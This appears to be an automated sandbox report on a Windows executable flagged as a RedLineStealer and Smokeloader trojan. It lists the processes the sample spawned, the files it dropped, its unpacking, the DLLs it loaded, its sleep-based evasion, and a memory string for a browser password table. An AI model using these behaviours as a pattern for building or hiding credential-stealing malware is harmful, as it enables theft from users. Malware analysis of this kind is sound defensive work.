Source: 00000004.00000002.1712229018.0000000000540000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000004.00000002.1712671753.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.1382263686.00000000006F8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12

Source: fuk7RfLrD3.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: ScreenUpdateSync[1].exe.2.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: D1F3.tmp.exe.2.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@6/7@3/3

Source: C:\Users\user\Desktop\fuk7RfLrD3.exe

Code function: 0_2_006F977E CreateToolhelp32Snapshot,Module32First,

0_2_006F977E

Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe

Code function: 4_2_0043B870 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

4_2_0043B870

Source: C:\Users\user\Desktop\fuk7RfLrD3.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\track_prt[1].htm

Jump to behavior

Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Mutant created: \Sessions\1\BaseNamedObjects\5h48t4j4t1rr
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7936

Source: C:\Users\user\Desktop\fuk7RfLrD3.exe

File created: C:\Users\user~1\AppData\Local\Temp\D1F3.tmp

Jump to behavior

Source: C:\Users\user\Desktop\fuk7RfLrD3.exe

Command line argument: Pq@

0_2_004070A0

Source: fuk7RfLrD3.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\fuk7RfLrD3.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\fuk7RfLrD3.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: D1F3.tmp.exe, 00000004.00000003.1460135442.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, D1F3.tmp.exe, 00000004.00000003.1444927928.0000000002E37000.00000004.00000800.00020000.00000000.sdmp, D1F3.tmp.exe, 00000004.00000003.1459821364.0000000002E37000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: fuk7RfLrD3.exe	Virustotal: Detection: 40%
Source: fuk7RfLrD3.exe	ReversingLabs: Detection: 55%

Source: unknown	Process created: C:\Users\user\Desktop\fuk7RfLrD3.exe "C:\Users\user\Desktop\fuk7RfLrD3.exe"
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Process created: C:\Users\user\Desktop\fuk7RfLrD3.exe "C:\Users\user\Desktop\fuk7RfLrD3.exe"
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Process created: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe "C:\Users\user~1\AppData\Local\Temp\D1F3.tmp.exe"
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7936 -s 1808
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Process created: C:\Users\user\Desktop\fuk7RfLrD3.exe "C:\Users\user\Desktop\fuk7RfLrD3.exe"	Jump to behavior
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Process created: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe "C:\Users\user~1\AppData\Local\Temp\D1F3.tmp.exe"	Jump to behavior

Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: C:\Users\user\Desktop\fuk7RfLrD3.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Unpacked PE file: 2.2.fuk7RfLrD3.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.wuhojic:W;.ragelu:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Unpacked PE file: 4.2.D1F3.tmp.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Unpacked PE file: 2.2.fuk7RfLrD3.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Unpacked PE file: 4.2.D1F3.tmp.exe.400000.0.unpack

Source: C:\Users\user\Desktop\fuk7RfLrD3.exe

Code function: 0_2_00407565 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,

0_2_00407565

Source: fuk7RfLrD3.exe	Static PE information: section name: .wuhojic
Source: fuk7RfLrD3.exe	Static PE information: section name: .ragelu

Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: 0_2_00403545 push ecx; ret	0_2_00403558
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: 0_2_006810F6 push ecx; ret	0_2_00681109
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: 0_2_006A80C8 push esp; retf	0_2_006A80D0
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: 0_2_0068D541 push es; retf	0_2_0068D546
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: 0_2_006AE507 push dword ptr [esp+ecx-75h]; iretd	0_2_006AE50B
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: 0_2_006AA511 pushad ; retf	0_2_006AA518
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: 0_2_006A86C6 push esp; retf	0_2_006A86C7
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: 0_2_00680722 push ecx; ret	0_2_00680735
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: 0_2_006FC17D pushad ; ret	0_2_006FC18C
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: 0_2_006F8148 push ebx; iretd	0_2_006F81FA
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: 0_2_006FB912 push ds; ret	0_2_006FB92B
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: 0_2_006FC2B9 pushad ; retf	0_2_006FC2BA
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: 0_2_006FEC0C pushad ; ret	0_2_006FEC28
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: 0_2_006FED8A push ecx; ret	0_2_006FEDA7
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: 0_2_006FC60A push 00000003h; ret	0_2_006FC60E
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: 2_2_00410756 push ecx; ret	2_2_00410769
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: 2_2_0040FD82 push ecx; ret	2_2_0040FD95
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_00441850 push eax; mov dword ptr [esp], 0E0908DBh	4_2_00441853
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_00543156 push ebx; ret	4_2_00543157
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_0054512A pushad ; ret	4_2_0054512B
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_00545195 pushfd ; ret	4_2_00545196
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_00543CFE push esi; retn 001Ch	4_2_00543D02
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_020FB05A push ebp; iretd	4_2_020FB05D
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_02111AB7 push eax; mov dword ptr [esp], 0E0908DBh	4_2_02111ABA

Source: fuk7RfLrD3.exe	Static PE information: section name: .text entropy: 7.539255550524008
Source: ScreenUpdateSync[1].exe.2.dr	Static PE information: section name: .text entropy: 7.810340877907069
Source: D1F3.tmp.exe.2.dr	Static PE information: section name: .text entropy: 7.810340877907069

Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	File created: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe			Jump to dropped file
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\ScreenUpdateSync[1].exe			Jump to dropped file

Source: C:\Users\user\Desktop\fuk7RfLrD3.exe

Code function: 2_2_0040E96A GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

2_2_0040E96A

Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Window / User API: threadDelayed 972			Jump to behavior
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Window / User API: threadDelayed 9017			Jump to behavior

Source: C:\Users\user\Desktop\fuk7RfLrD3.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_2-33098

Source: C:\Users\user\Desktop\fuk7RfLrD3.exe

API coverage: 8.1 %

Source: C:\Users\user\Desktop\fuk7RfLrD3.exe TID: 7912	Thread sleep count: 972 > 30	Jump to behavior
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe TID: 7912	Thread sleep time: -701784s >= -30000s	Jump to behavior
